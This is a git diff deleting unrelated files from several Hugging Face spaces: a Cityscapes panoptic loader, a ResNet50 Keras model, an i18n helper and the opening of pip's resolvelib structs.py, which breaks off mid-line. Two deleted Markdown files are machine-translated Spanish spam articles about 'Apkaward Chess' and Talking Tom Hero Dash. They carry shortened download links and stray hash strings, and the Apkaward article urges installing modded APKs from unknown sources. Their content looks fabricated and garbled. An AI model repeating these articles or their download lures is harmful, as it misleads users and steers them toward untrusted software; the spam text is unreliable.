e.g., - "~/cityscapes/gtFine/cityscapes_panoptic_train.json". - meta (dict): dictionary containing "thing_dataset_id_to_contiguous_id" - and "stuff_dataset_id_to_contiguous_id" to map category ids to - contiguous ids for training. - - Returns: - list[dict]: a list of dicts in Detectron2 standard format. (See - `Using Custom Datasets `_ ) - """ - - def _convert_category_id(segment_info, meta): - if segment_info["category_id"] in meta["thing_dataset_id_to_contiguous_id"]: - segment_info["category_id"] = meta["thing_dataset_id_to_contiguous_id"][ - segment_info["category_id"] - ] - else: - segment_info["category_id"] = meta["stuff_dataset_id_to_contiguous_id"][ - segment_info["category_id"] - ] - return segment_info - - assert os.path.exists( - gt_json - ), "Please run `python cityscapesscripts/preparation/createPanopticImgs.py` to generate label files." # noqa - with open(gt_json) as f: - json_info = json.load(f) - files = get_cityscapes_panoptic_files(image_dir, gt_dir, json_info) - ret = [] - for image_file, label_file, segments_info in files: - sem_label_file = ( - image_file.replace("leftImg8bit", "gtFine").split(".")[0] + "_labelTrainIds.png" - ) - segments_info = [_convert_category_id(x, meta) for x in segments_info] - ret.append( - { - "file_name": image_file, - "image_id": "_".join( - os.path.splitext(os.path.basename(image_file))[0].split("_")[:3] - ), - "sem_seg_file_name": sem_label_file, - "pan_seg_file_name": label_file, - "segments_info": segments_info, - } - ) - assert len(ret), f"No images found in {image_dir}!" - assert PathManager.isfile( - ret[0]["sem_seg_file_name"] - ), "Please generate labelTrainIds.png with cityscapesscripts/preparation/createTrainIdLabelImgs.py" # noqa - assert PathManager.isfile( - ret[0]["pan_seg_file_name"] - ), "Please generate panoptic annotation with python cityscapesscripts/preparation/createPanopticImgs.py" # noqa - return ret - - -_RAW_CITYSCAPES_PANOPTIC_SPLITS = { - "cityscapes_fine_panoptic_train": ( - "cityscapes/leftImg8bit/train", - "cityscapes/gtFine/cityscapes_panoptic_train", - "cityscapes/gtFine/cityscapes_panoptic_train.json", - ), - "cityscapes_fine_panoptic_val": ( - "cityscapes/leftImg8bit/val", - "cityscapes/gtFine/cityscapes_panoptic_val", - "cityscapes/gtFine/cityscapes_panoptic_val.json", - ), - # "cityscapes_fine_panoptic_test": not supported yet -} - - -def register_all_cityscapes_panoptic(root): - meta = {} - # The following metadata maps contiguous id from [0, #thing categories + - # #stuff categories) to their names and colors. We have to replica of the - # same name and color under "thing_*" and "stuff_*" because the current - # visualization function in D2 handles thing and class classes differently - # due to some heuristic used in Panoptic FPN. We keep the same naming to - # enable reusing existing visualization functions. - thing_classes = [k["name"] for k in CITYSCAPES_CATEGORIES] - thing_colors = [k["color"] for k in CITYSCAPES_CATEGORIES] - stuff_classes = [k["name"] for k in CITYSCAPES_CATEGORIES] - stuff_colors = [k["color"] for k in CITYSCAPES_CATEGORIES] - - meta["thing_classes"] = thing_classes - meta["thing_colors"] = thing_colors - meta["stuff_classes"] = stuff_classes - meta["stuff_colors"] = stuff_colors - - # There are three types of ids in cityscapes panoptic segmentation: - # (1) category id: like semantic segmentation, it is the class id for each - # pixel. Since there are some classes not used in evaluation, the category - # id is not always contiguous and thus we have two set of category ids: - # - original category id: category id in the original dataset, mainly - # used for evaluation. - # - contiguous category id: [0, #classes), in order to train the classifier - # (2) instance id: this id is used to differentiate different instances from - # the same category. For "stuff" classes, the instance id is always 0; for - # "thing" classes, the instance id starts from 1 and 0 is reserved for - # ignored instances (e.g. crowd annotation). - # (3) panoptic id: this is the compact id that encode both category and - # instance id by: category_id * 1000 + instance_id. - thing_dataset_id_to_contiguous_id = {} - stuff_dataset_id_to_contiguous_id = {} - - for k in CITYSCAPES_CATEGORIES: - if k["isthing"] == 1: - thing_dataset_id_to_contiguous_id[k["id"]] = k["trainId"] - else: - stuff_dataset_id_to_contiguous_id[k["id"]] = k["trainId"] - - meta["thing_dataset_id_to_contiguous_id"] = thing_dataset_id_to_contiguous_id - meta["stuff_dataset_id_to_contiguous_id"] = stuff_dataset_id_to_contiguous_id - - for key, (image_dir, gt_dir, gt_json) in _RAW_CITYSCAPES_PANOPTIC_SPLITS.items(): - image_dir = os.path.join(root, image_dir) - gt_dir = os.path.join(root, gt_dir) - gt_json = os.path.join(root, gt_json) - - DatasetCatalog.register( - key, lambda x=image_dir, y=gt_dir, z=gt_json: load_cityscapes_panoptic(x, y, z, meta) - ) - MetadataCatalog.get(key).set( - panoptic_root=gt_dir, - image_root=image_dir, - panoptic_json=gt_json, - gt_dir=gt_dir.replace("cityscapes_panoptic_", ""), - evaluator_type="cityscapes_panoptic_seg", - ignore_label=255, - label_divisor=1000, - **meta, - ) diff --git a/spaces/BIASLab/sars-cov-2-classification-fcgr/src/models/resnet50_9mers.py b/spaces/BIASLab/sars-cov-2-classification-fcgr/src/models/resnet50_9mers.py deleted file mode 100644 index 33bd3a807a5f20d4f6a78a82ad7dd0ba9addfe95..0000000000000000000000000000000000000000 --- a/spaces/BIASLab/sars-cov-2-classification-fcgr/src/models/resnet50_9mers.py +++ /dev/null @@ -1,103 +0,0 @@ -# https://github.com/c1ph3rr/Deep-Residual-Learning-for-Image-Recognition/blob/master/Resnet50.py -from pathlib import Path -from tensorflow.keras.models import Model -from tensorflow.keras.layers import ( - Input, - Conv2D, - Dense, - MaxPool2D, - GlobalAveragePooling2D, - Add, - Activation, - BatchNormalization, - ZeroPadding2D, -) - -# Reference name of model -MODEL_NAME = str(Path(__file__).resolve().stem) - -def identity_block(inp, filters, kernel_size, block, layer): - - f1, f2, f3 = filters - - conv_name = 'id_conv_b' + block + '_l' + layer - batch_name = 'id_batch_b' + block + '_l' + layer - - x = Conv2D(filters=f1, kernel_size=1, padding='same', kernel_initializer='he_normal', name=conv_name + '_a')(inp) - x = BatchNormalization(name=batch_name + '_a')(x) - x = Activation('relu')(x) - - x = Conv2D(filters=f2, kernel_size=kernel_size, padding='same', kernel_initializer='he_normal', name=conv_name + '_b')(x) - x = BatchNormalization(name=batch_name + '_b')(x) - x = Activation('relu')(x) - - x = Conv2D(filters=f3, kernel_size=1, padding='same', kernel_initializer='he_normal', name=conv_name + '_c')(x) - x = BatchNormalization(name=batch_name + '_c')(x) - - add = Add()([inp, x]) - x = Activation('relu')(add) - - return x - - -def convolutional_block(inp, filters, kernel_size, block, layer, strides=2): - - f1, f2, f3 = filters - - conv_name = 'res_conv_b' + block + '_l' + layer - batch_name = 'res_batch_b' + block + '_l' + layer - - y = Conv2D(filters=f1, kernel_size=1, padding='same', strides=strides, kernel_initializer='he_normal', name=conv_name + '_a')(inp) - y = BatchNormalization(name=batch_name + '_a')(y) - y = Activation('relu')(y) - - y = Conv2D(filters=f2, kernel_size=kernel_size, padding='same', kernel_initializer='he_normal', name=conv_name + '_b')(y) - y = BatchNormalization(name=batch_name + '_b')(y) - y = Activation('relu')(y) - - y = Conv2D(filters=f3, kernel_size=1, padding='same', kernel_initializer='he_normal', name=conv_name + '_c')(y) - y = BatchNormalization(name=batch_name + '_c')(y) - - shortcut = Conv2D(filters=f3, kernel_size=1, strides=strides, kernel_initializer='he_normal', name=conv_name + '_shortcut')(inp) - shortcut = BatchNormalization(name=batch_name + '_shortcut')(shortcut) - - add = Add()([shortcut, y]) - y = Activation('relu')(add) - - return y - -def get_model(n_outputs): - - inp = Input(shape=(512, 512, 1), name='input') - padd = ZeroPadding2D(3)(inp) - - conv1 = Conv2D(64, 7, strides=2, padding='valid', name='conv1')(padd) - conv1 = BatchNormalization(name='batch2')(conv1) - conv1 = Activation('relu')(conv1) - conv1 = ZeroPadding2D(1)(conv1) - conv1 = MaxPool2D(3, 2)(conv1) - - conv2 = convolutional_block(conv1, [64,64,256], 3, '2', '1', strides=1) - conv2 = identity_block(conv2, [64,64,256], 3, '2', '2') - conv2 = identity_block(conv2, [64,64,256], 3, '2', '3') - - conv3 = convolutional_block(conv2, [128,128,512], 3, '3', '1') - conv3 = identity_block(conv3, [128,128,512], 3, '3', '2') - conv3 = identity_block(conv3, [128,128,512], 3, '3', '3') - conv3 = identity_block(conv3, [128,128,512], 3, '3', '4') - - conv4 = convolutional_block(conv3, [256,256,1024], 3, '4', '1') - conv4 = identity_block(conv4, [256,256,1024], 3, '4', '2') - conv4 = identity_block(conv4, [256,256,1024], 3, '4', '3') - conv4 = identity_block(conv4, [256,256,1024], 3, '4', '4') - conv4 = identity_block(conv4, [256,256,1024], 3, '4', '5') - conv4 = identity_block(conv4, [256,256,1024], 3, '4', '6') - - conv5 = convolutional_block(conv4, [512,512,2048], 3, '5', '1') - conv5 = identity_block(conv5, [512,512,2048], 3, '5', '2') - conv5 = identity_block(conv5, [512,512,2048], 3, '5', '3') - - avg_pool = GlobalAveragePooling2D()(conv5) - out = Dense(n_outputs, activation='softmax')(avg_pool) - - return Model(inp, out) \ No newline at end of file diff --git a/spaces/Bart92/RVC_HF/i18n.py b/spaces/Bart92/RVC_HF/i18n.py deleted file mode 100644 index b958c6f7244c4b920e097a9a9e67e81990d03f59..0000000000000000000000000000000000000000 --- a/spaces/Bart92/RVC_HF/i18n.py +++ /dev/null @@ -1,43 +0,0 @@ -import json - -def load_language_list(language): - try: - with open(f"./i18n/locale/{language}.json", "r", encoding="utf-8") as f: - return json.load(f) - except FileNotFoundError: - raise FileNotFoundError( - f"Failed to load language file for {language}. Check if the correct .json file exists." - ) - - -class I18nAuto: - """ - A class used for internationalization using JSON language files. - - Examples - -------- - >>> i18n = I18nAuto('en_US') - >>> i18n.print() - Using Language: en_US - """ - def __init__(self, language=None): - from locale import getdefaultlocale - language = language or getdefaultlocale()[0] - if not self._language_exists(language): - language = "en_US" - - self.language_map = load_language_list(language) - self.language = language - - @staticmethod - def _language_exists(language): - from os.path import exists - return exists(f"./i18n/locale/{language}.json") - - def __call__(self, key): - """Returns the translation of the given key if it exists, else returns the key itself.""" - return self.language_map.get(key, key) - - def print(self): - """Prints the language currently in use.""" - print(f"Using Language: {self.language}") \ No newline at end of file diff --git a/spaces/Benson/text-generation/Examples/Apkaward Chess.md b/spaces/Benson/text-generation/Examples/Apkaward Chess.md deleted file mode 100644 index ce6eb247892e0dea0500a608e1d3dd988f0be937..0000000000000000000000000000000000000000 --- a/spaces/Benson/text-generation/Examples/Apkaward Chess.md +++ /dev/null @@ -1,55 +0,0 @@ - -

Apkaward Chess: Una Nueva Forma de Jugar Ajedrez Online

-

Si eres un fanático del ajedrez y estás buscando una nueva forma de jugarlo online, es posible que quieras echar un vistazo a Apkaward Chess. Este es un juego de ajedrez que cuenta con 5D ajedrez con multiverso de viaje en el tiempo, que se basa en el popular juego 5D Ajedrez con Multiverso de Viaje en el Tiempo por Thunkspace. En este artículo, le diremos qué es Apkaward, qué es Apkaward Chess, cómo jugarlo, cuáles son las reglas del ajedrez 5D y por qué debe jugarlo.

-

¿Qué es Apkaward?

-

Apkaward es un sitio web que ofrece juegos gratuitos y de pago para dispositivos Android. Puedes encontrar una variedad de juegos en diferentes géneros, como acción, aventura, rompecabezas y más. También puede descargar versiones modificadas de algunos juegos, que le dan recursos ilimitados o funciones desbloqueadas. Algunos de los juegos disponibles en Apkaward son Minecraft PE, GTA San Andreas, PUBG Mobile, y más.

-

apkaward chess


DOWNLOAD >>> https://bltlly.com/2v6Mjt



-

Apkaward también tiene un canal de YouTube donde muestran sus juegos y cómo descargarlos. Puedes ver sus videos para ver cómo se ven y juegan los juegos, y para obtener los enlaces para descargarlos. También puedes suscribirte a su canal para recibir notificaciones de sus últimas subidas.

-

¿Qué es Apkaward Chess?

-

Apkaward Chess es uno de los juegos disponibles en Apkaward. Es un juego de ajedrez que presenta ajedrez 5D con viajes en el tiempo multiverso. Esto significa que puede mover sus piezas no solo en el tablero, sino también a través de turnos y líneas de tiempo. Puedes crear nuevas líneas de tiempo moviendo tus piezas hacia atrás en el tiempo o hacia los lados en el tiempo. También puede capturar piezas de otras líneas de tiempo o enviar sus piezas a otras líneas de tiempo. El objetivo es hacer jaque mate al rey de tu oponente en cualquier línea de tiempo.

- -

¿Cómo jugar al ajedrez apkaward?

-

Apkaward Chess se puede descargar desde el sitio web de Apkaward o el canal de YouTube. Puede encontrar los enlaces a ambos en las referencias a continuación . Una vez que haya descargado el archivo APK, debe instalarlo en su dispositivo. Es posible que necesite habilitar la instalación de aplicaciones de fuentes desconocidas en su configuración. Después de eso, puede iniciar el juego y comenzar a jugar.

-

Apkaward Chess se puede jugar fuera de línea o en línea contra otros jugadores o una IA. Puedes elegir entre diferentes niveles de dificultad y modos de juego. También puede personalizar el tablero y las piezas a su gusto. El juego tiene un modo tutorial que te enseña los fundamentos del ajedrez 5D y cómo usar la interfaz. También puede acceder al menú de ayuda en cualquier momento durante el juego para obtener más información.

-

Apkaward Chess tiene las mismas reglas que 5D Chess con Multiverse Time Travel, que se explican en la siguiente sección.

-

¿Cuáles son las Reglas del Ajedrez 5D con Multiverso Viaje en el Tiempo?

-

5D Chess with Multiverse Time Travel es una variante de ajedrez que introduce dos ejes adicionales de movimiento: el eje de giro y el eje de línea de tiempo. Todas las piezas conservan sus habilidades de movimiento de ajedrez estándar, pero también pueden moverse a través de turnos y líneas de tiempo. El juego comienza con una configuración de ajedrez normal, pero a medida que el juego progresa, se vuelve cada vez más complejo a través de una serie de líneas de tiempo alternativas que el jugador puede aprovechar.

-

El eje de giro está representado por una fila horizontal de tableros, cada uno correspondiente a un giro diferente en el juego. El eje de la línea de tiempo está representado por una columna vertical de tableros, cada uno correspondiente a una línea de tiempo diferente en el juego. La línea de tiempo principal es la que comienza desde la posición inicial y sigue los movimientos realizados por ambos jugadores. Las líneas de tiempo alternativas se crean cuando una pieza se mueve hacia atrás en el tiempo o hacia los lados en el tiempo.

-

- -

El objetivo del juego es hacer jaque mate al rey de tu oponente en cualquier cronología. Sin embargo, hay algunas reglas y conceptos adicionales que debes tener en cuenta:

-
    -
  • Una pieza solo puede retroceder en el tiempo o de lado en el tiempo si no crea una paradoja. Una paradoja ocurre cuando una pieza se mueve a una posición donde habría sido capturada o bloqueada por sí misma u otra pieza en un giro o línea de tiempo anterior.
  • -
  • Una pieza puede capturar otra pieza de cualquier línea de tiempo, siempre y cuando no cree una paradoja. Capturar una pieza de otra línea de tiempo la elimina de todas las tablas posteriores donde habría existido.
  • -
  • Una pieza puede estar en jaque o jaque mate desde cualquier línea de tiempo, siempre y cuando sea visible desde el tablero actual. Una pieza es visible si no hay otra pieza bloqueando su línea de visión a través de giros y líneas de tiempo.
  • -
  • Un jugador puede mover su rey fuera de jaque moviéndolo en el tablero, moviéndolo a través de turnos o líneas de tiempo, o moviendo otra pieza para bloquear o capturar al atacante.
  • -
  • Un jugador no puede hacer un movimiento que pondría a su rey en jaque en cualquier línea de tiempo, incluso si no es visible desde el tablero actual.
  • -
  • Un reproductor no puede hacer un movimiento que cree un bucle infinito de líneas de tiempo. Un bucle infinito ocurre cuando una pieza se mueve hacia atrás en el tiempo o hacia los lados en el tiempo a una posición donde ya ha estado antes.
  • -
-

Estas son las reglas básicas del ajedrez 5D, pero hay conceptos y estrategias más avanzadas que puedes aprender mientras juegas. También puede consultar el sitio web oficial de 5D Chess with Multiverse Time Travel para más detalles y ejemplos.

-

¿Por qué jugar al ajedrez apkaward?

- -

Apkaward Chess es también un juego único e innovador que ofrece una nueva forma de jugar al ajedrez en línea. Puedes jugar contra otros jugadores de todo el mundo que hayan descargado Apkaward Chess, o contra una IA que se adapte a tu nivel de habilidad. También puedes chatear con tus oponentes y compartir tus consejos y trucos con ellos. También puedes personalizar la configuración y las preferencias del juego para adaptarlas a tu estilo y estado de ánimo.

-

Apkaward Chess es un juego gratuito que puedes disfrutar en tu dispositivo Android en cualquier momento y en cualquier lugar. No necesitas una conexión a Internet para jugar sin conexión, y no necesitas pagar nada para descargar o jugar el juego. También puedes actualizar el juego regularmente para obtener nuevas características y mejoras.

-

Conclusión

-

Apkaward Chess es una nueva forma de jugar ajedrez en línea que cuenta con 5D ajedrez con multiverso de viaje en el tiempo. Se basa en el popular juego 5D Chess con Multiverse Time Travel de Thunkspace, que está disponible para Windows, macOS y Linux. Apkaward Chess se puede descargar gratis desde el sitio web de Apkaward o el canal de YouTube, y se puede jugar fuera de línea o en línea contra otros jugadores o una IA. Apkaward Chess es un juego divertido y desafiante que pone a prueba tu pensamiento estratégico y creatividad, así como un juego único e innovador que ofrece una nueva dimensión del ajedrez. Si eres un fan del ajedrez y estás buscando una nueva forma de jugar online, deberías probar Apkaward Chess.

-

Preguntas frecuentes

-

¿Cuál es la diferencia entre el ajedrez 5D y el ajedrez estándar?

-

5D chess es una variante de ajedrez que introduce dos ejes adicionales de movimiento: el eje de giro y el eje de línea de tiempo. Esto significa que puede mover sus piezas no solo en el tablero, sino también a través de turnos y líneas de tiempo. Puedes crear nuevas líneas de tiempo moviendo tus piezas hacia atrás en el tiempo o hacia los lados en el tiempo. También puede capturar piezas de otras líneas de tiempo o enviar sus piezas a otras líneas de tiempo. El objetivo es hacer jaque mate al rey de tu oponente en cualquier línea de tiempo.

- -

Puede descargar Apkaward Chess desde el sitio web de Apkaward o el canal de YouTube. Puede encontrar los enlaces a ambos en las referencias a continuación . Una vez que haya descargado el archivo APK, debe instalarlo en su dispositivo. Es posible que necesite habilitar la instalación de aplicaciones de fuentes desconocidas en su configuración. Después de eso, puede iniciar el juego y comenzar a jugar.

-

¿Cómo juego Apkaward Chess online?

-

Puedes jugar Apkaward Chess online contra otros jugadores o una IA. Necesitas tener una conexión a Internet para jugar online. Puedes elegir entre diferentes niveles de dificultad y modos de juego. También puedes chatear con tus oponentes y compartir tus consejos y trucos con ellos.

-

¿Cómo aprendo las reglas del ajedrez 5D?

-

Puedes aprender las reglas del ajedrez 5D jugando el modo tutorial en Apkaward Chess. Este modo le enseña los fundamentos del ajedrez 5D y cómo usar la interfaz. También puede acceder al menú de ayuda en cualquier momento durante el juego para obtener más información. También puede consultar el sitio web oficial de 5D Chess with Multiverse Time Travel para más detalles y ejemplos.

-

¿Cuáles son algunos consejos y trucos para jugar al ajedrez 5D?

-

Algunos consejos y trucos para jugar al ajedrez 5D son:

-
    -
  • Piensa con anticipación tus movimientos y considera cómo afectarán no solo tu posición actual, sino también tus posiciones pasadas y futuras, así como los movimientos de tu oponente a través de giros y líneas de tiempo.
  • -
  • Usa la capacidad de tus piezas para moverte a través de turnos y líneas de tiempo para crear nuevas oportunidades o evitar amenazas. También puedes usarlas para confundir o sorprender a tu oponente.
  • -
  • Tenga cuidado de no crear paradojas o bucles infinitos al mover sus piezas a través de giros y líneas de tiempo. Estos movimientos son ilegales y resultarán en una pérdida.
  • -
  • Tenga en cuenta todas las posibles comprobaciones y checkmates de cualquier línea de tiempo, incluso si no son visibles desde el tablero actual. Puedes usar la interfaz para ver todos los tableros del juego.
  • - -

64aa2da5cf
-
-
\ No newline at end of file diff --git a/spaces/Benson/text-generation/Examples/Descargar El Juego Talking Tom Hero Dash Para PC.md b/spaces/Benson/text-generation/Examples/Descargar El Juego Talking Tom Hero Dash Para PC.md deleted file mode 100644 index 24e851d14611c8602120efd6d8e2c55e4e0347b0..0000000000000000000000000000000000000000 --- a/spaces/Benson/text-generation/Examples/Descargar El Juego Talking Tom Hero Dash Para PC.md +++ /dev/null @@ -1,85 +0,0 @@ -
-

Talking Tom Hero Dash: Un juego divertido y lleno de acción para PC

-

¿Te encanta jugar en tu PC? ¿Te gusta correr, saltar y salvar el mundo con tus personajes favoritos? Si respondiste que sí, entonces deberías probar Talking Tom Hero Dash, un juego popular y emocionante que puedes descargar y jugar en tu PC. En este artículo, le diremos qué es Talking Tom Hero Dash, cómo descargarlo para PC y por qué debe jugarlo en su computadora.

-

Descargar el juego Talking Tom hero dash para PC


Download File ✸✸✸ https://bltlly.com/2v6JNF



-

¿Qué es Talking Tom Hero Dash?

-

Talking Tom Hero Dash es un juego desarrollado por Outfit7 Limited, los creadores de My Talking Tom, My Talking Angela y Talking Tom Gold Run. Es un juego de corredor sin fin que cuenta con Talking Tom y sus amigos como superhéroes que tienen que detener el mal Rakoonz de destruir el mundo.

-

La historia y el juego

-Los Rakoonz han capturado a Angela, Ben, Hank y Ginger, y depende de Tom salvarlos. Para ello, tiene que correr y perseguirlos a través de diferentes lugares, como templos perdidos, ciudades antiguas, dunas del desierto y picos nevados. En el camino, tiene que esquivar obstáculos, recoger monedas y gemas, usar power-ups y gadgets, y luchar contra el Rakoonz. También puede desbloquear nuevos atuendos y mejorar sus habilidades a medida que avanza.

-

Las características y los gráficos

-

Talking Tom Hero Dash tiene muchas características que lo hacen divertido y atractivo. Por ejemplo, puedes jugar con diferentes personajes, cada uno con sus propios poderes especiales. También puedes completar misiones y eventos para ganar recompensas y desbloquear nuevos mundos. También puedes ver videos de los personajes animados de Outfit7 en YouTube dentro del juego. El juego también tiene gráficos increíbles que son coloridos, vibrantes y detallados. Las animaciones son suaves y realistas, y los efectos de sonido son vivos e inmersivos.

-

¿Cómo descargar Talking Tom Hero Dash para PC?

-

Hay varias maneras de descargar Talking Tom Hero Dash para PC. Aquí están algunas de ellas:

- -

La forma más fácil de descargar Talking Tom Hero Dash para PC es desde la tienda de Microsoft. Todo lo que necesita es un dispositivo Windows 10 y una conexión a Internet. Estos son los pasos:

-

-
    -
  1. Abra la aplicación de Microsoft Store en su PC.
  2. -
  3. Buscar "Talking Tom Hero Dash" en la barra de búsqueda.
  4. -
  5. Seleccione el juego de los resultados y haga clic en "Obtener" o "Comprar" dependiendo de si es gratis o de pago.
  6. -
  7. Espere a que finalicen la descarga y la instalación.
  8. -
  9. Inicie el juego desde su menú Inicio o escritorio.
  10. -
-

Descarga desde una plataforma de terceros

-

Otra forma de descargar Talking Tom Hero Dash para PC es desde una plataforma de terceros como Steam o Epic Games Store. Estas son plataformas de distribución digital que te permiten comprar y descargar juegos para tu PC. Primero tendrá que crear una cuenta e instalar su lanzador en su PC. Estos son los pasos:

-
    -
  1. Ir a la página web de la plataforma que desea utilizar (por ejemplo, [Steam]( 4 ) o [Epic Games Store]( 5 )).
  2. -
  3. Crea una cuenta o inicia sesión con la existente.
  4. -
  5. Descargue e instale su lanzador en su PC.
  6. -
  7. Abra su lanzador y busque "Talking Tom Hero Dash" en su tienda.
  8. -
  9. Seleccione el juego de los resultados y haga clic en "Añadir al carrito" o "Obtener" dependiendo de si es gratis o de pago.
  10. -
  11. Proceda a pagar el juego si es necesario.
  12. -
  13. Espera a que finalicen la descarga y la instalación. Inicia el juego desde su lanzador o tu escritorio.
  14. -
-

Descargar desde el sitio web oficial

-

La tercera forma de descargar Talking Tom Hero Dash para PC es desde el sitio web oficial de Outfit7 Limited. Esta es la forma más directa y fiable de conseguir el juego, pero puede requerir más pasos y habilidades técnicas. Estos son los pasos:

-
    -
  1. Ir al [sitio web oficial] de Outfit7 Limited.
  2. -
  3. Haga clic en "Juegos" y seleccione "Talking Tom Hero Dash" de la lista.
  4. - -
  5. Guarde el archivo en su PC y ejecútelo como administrador.
  6. -
  7. Siga las instrucciones en la pantalla para instalar el juego.
  8. -
  9. Inicie el juego desde su escritorio o menú Inicio.
  10. -
-

¿Por qué jugar Talking Tom Hero Dash en PC?

-

Ahora que sabe cómo descargar Talking Tom Hero Dash para PC, puede que se pregunte por qué debe jugar en su ordenador en lugar de su dispositivo móvil. Bueno, hay muchas razones por las que jugar juegos para PC puede ser más agradable y gratificante que jugar juegos para móviles. Estas son algunas de ellas:

-

Los beneficios de jugar juegos de PC

-

Jugar juegos de PC puede tener muchos beneficios para su salud, habilidades y estado de ánimo. Por ejemplo, jugar juegos de PC puede:

-
    -
  • Mejora tus habilidades cognitivas, como la memoria, la atención, la resolución de problemas y la creatividad.
  • -
  • Mejora la coordinación mano-ojo, el tiempo de reacción y la conciencia espacial.
  • -
  • Reduce tu estrés, ansiedad y depresión, y aumenta tu felicidad y autoestima.
  • -
  • Aumenta tus habilidades sociales, comunicación y trabajo en equipo, especialmente si juegas en línea o con amigos.
  • -
  • Educarte sobre diferentes temas, culturas y perspectivas, e inspirarte a aprender más.
  • -
-

Las ventajas de jugar Talking Tom Hero Dash en PC

-

Jugar Talking Tom Hero Dash en PC también puede tener algunas ventajas específicas sobre jugarlo en su dispositivo móvil. Por ejemplo, jugar Talking Tom Hero Dash en PC puede:

-
    -
  • Darle una pantalla más grande y mejor, que puede mejorar su visibilidad, inmersión y disfrute.
  • -
  • Le ofrece un rendimiento más suave y rápido, que puede evitar el retraso, estrellarse o congelarse.
  • -
  • Le proporciona más opciones de control, como el uso de un teclado, ratón o controlador, que puede adaptarse a sus preferencias y comodidad.
  • -
  • Ahorra batería y espacio de almacenamiento en tu dispositivo móvil, lo que puede extender su vida útil y funcionalidad.
  • - -
-

Conclusión

-

Talking Tom Hero Dash es un juego divertido y lleno de acción que puedes descargar y jugar en tu PC. Tiene una historia cautivadora, un juego emocionante y unos gráficos impresionantes. También tiene muchas características que lo hacen atractivo y entretenido. Puede descargarlo desde Microsoft Store, una plataforma de terceros o el sitio web oficial. También puede disfrutar de muchos beneficios y ventajas de jugar en su PC. Entonces, ¿qué estás esperando? Descargar Talking Tom Hero Dash para PC hoy y unirse a Tom y sus amigos en su aventura heroica!

-

Preguntas frecuentes

-

Aquí hay algunas preguntas frecuentes sobre Talking Tom Hero Dash:

-

Q: ¿Es Talking Tom Hero Dash libre para jugar?

-

A: Sí, Talking Tom Hero Dash es gratis para jugar en todas las plataformas. Sin embargo, puede contener compras en la aplicación que le permiten comprar monedas, gemas u otros artículos con dinero real.

-

P: ¿Es seguro para los niños Talking Tom Hero Dash?

-

A: Sí, Talking Tom Hero Dash es seguro para los niños. Tiene una calificación de 4+ en la Microsoft Store y 9+ en la App Store. No contiene ninguna violencia, gore, o blasfemia. Sin embargo, puede tener algunos anuncios o enlaces que conducen a otros sitios web o aplicaciones que pueden no ser adecuados para los niños. Por lo tanto, se recomienda orientación parental.

-

P: ¿Cómo puedo obtener más monedas y gemas en Talking Tom Hero Dash?

-

A: Hay muchas maneras de obtener más monedas y gemas en Talking Tom Hero Dash. Por ejemplo, puedes:

-
    -
  • Corre tan lejos como puedas y recíbelos en el camino.
  • -
  • Completa misiones y eventos para ganarlos como recompensas.
  • -
  • Ver vídeos o anuncios para obtenerlos gratis.
  • -
  • Hazte miembro VIP para
  • Cómpralos con dinero real si quieres.
  • -
-

Q: ¿Cómo puedo desbloquear nuevos personajes y trajes en Talking Tom Hero Dash?

- -

Q: ¿Cómo puedo actualizar Talking Tom Hero Dash en PC?

-

A: Para actualizar Talking Tom Hero Dash en PC, debe verificar si hay una nueva versión disponible en la plataforma donde la descargó. Si lo hay, puede seguir las instrucciones en la pantalla para descargar e instalar la actualización. Alternativamente, puedes desinstalar el juego y reinstalarlo con la última versión.

64aa2da5cf
-
-
\ No newline at end of file diff --git a/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/resolvelib/structs.py b/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/resolvelib/structs.py deleted file mode 100644 index 359a34f60187591c26ee46d60e49c136acd6c765..0000000000000000000000000000000000000000 --- a/spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/resolvelib/structs.py +++ /dev/null @@ -1,170 +0,0 @@ -import itertools - -from .compat import collections_abc - - -class DirectedGraph(object): - """A graph structure with directed edges.""" - - def __init__(self): - self._vertices = set() - self._forwards = {} # -> Set[] - self._backwards = {} # -> Set[] - - def __iter__(self): - return iter(self._vertices) - - def __len__(self): - return len(self._vertices) - - def __contains__(self, key): - return key in self._vertices - - def copy(self): - """Return a shallow copy of this graph.""" - other = DirectedGraph() - other._vertices = set(self._vertices) - other._forwards = {k: set(v) for k, v in self._forwards.items()} - other._backwards = {k: set(v) for k, v in self._backwards.items()} - return other - - def add(self, key): - """Add a new vertex to the graph.""" - if key in self._vertices: - raise ValueError("vertex exists") - self._vertices.add(key) - self._forwards[key] = set() - self._backwards[key] = set() - - def remove(self, key): - """Remove a vertex from the graph, disconnecting all edges from/to it.""" - self._vertices.remove(key) - for f in self._forwards.pop(key): - self._backwards[f].remove(key) - for t in self._backwards.pop(key): - self._forwards[t].remove(key) - - def connected(self, f, t): - return f in self._backwards[t] and t in self._forwards[f] - - def connect(self, f, t): - """Connect two existing vertices. - - Nothing happens if the vertices are already connected. - """ - if t not in self._vertices: - raise KeyError(t) - self._forwards[f].add(t) - self._backwards[t].add(f) - - def iter_edges(self): - for f, children in self._forwards.items(): - for t in children: - yield f, t - - def iter_children(self, key): - return iter(self._forwards[key]) - - def iter_parents(self, key): - return iter(self._backwards[key]) - - -class IteratorMapping(collections_abc.Mapping): - def __init__(self, mapping, accessor, appends=None): - self._mapping = mapping - self._accessor = accessor - self._appends = appends or {} - - def __repr__(self): - return "IteratorMapping({!r}, {!r}, {!r})".format( - self._mapping, - self._accessor, - self._appends, - ) - - def __bool__(self): - return bool(self._mapping or self._appends) - - __nonzero__ = __bool__ # XXX: Python 2. - - def __contains__(self, key): - return key in self._mapping or key in self._appends - - def __getitem__(self, k): - try: - v = self._mapping[k] - except KeyError: - return iter(self._appends[k]) - return itertools.chain(self._accessor(v), self._appends.get(k, ())) - - def __iter__(self): - more = (k for k in self._appends if k not in self._mapping) - return itertools.chain(self._mapping, more) - - def __len__(self): - more = sum(1 for k in self._appends if k not in self._mapping) - return len(self._mapping) + more - - -class _FactoryIterableView(object): - """Wrap an iterator factory returned by `find_matches()`. - - Calling `iter()` on this class would invoke the underlying iterator - factory, making it a "collection with ordering" that can be iterated - through multiple times, but lacks random access methods presented in - built-in Python sequence types. - """ - - def __init__(self, factory): - self._factory = factory - self._iterable = None - - def __repr__(self): - return "{}({})".format(type(self).__name__, list(self)) - - def __bool__(self): - try: - next(iter(self)) - except StopIteration: - return False - return True - - __nonzero__ = __bool__ # XXX: Python 2. - - def __iter__(self): - iterable = ( - self._factory() if self._iterable is None else self._iterable - ) - self._iterable, current = itertools.tee(iterable) - return current - - -class 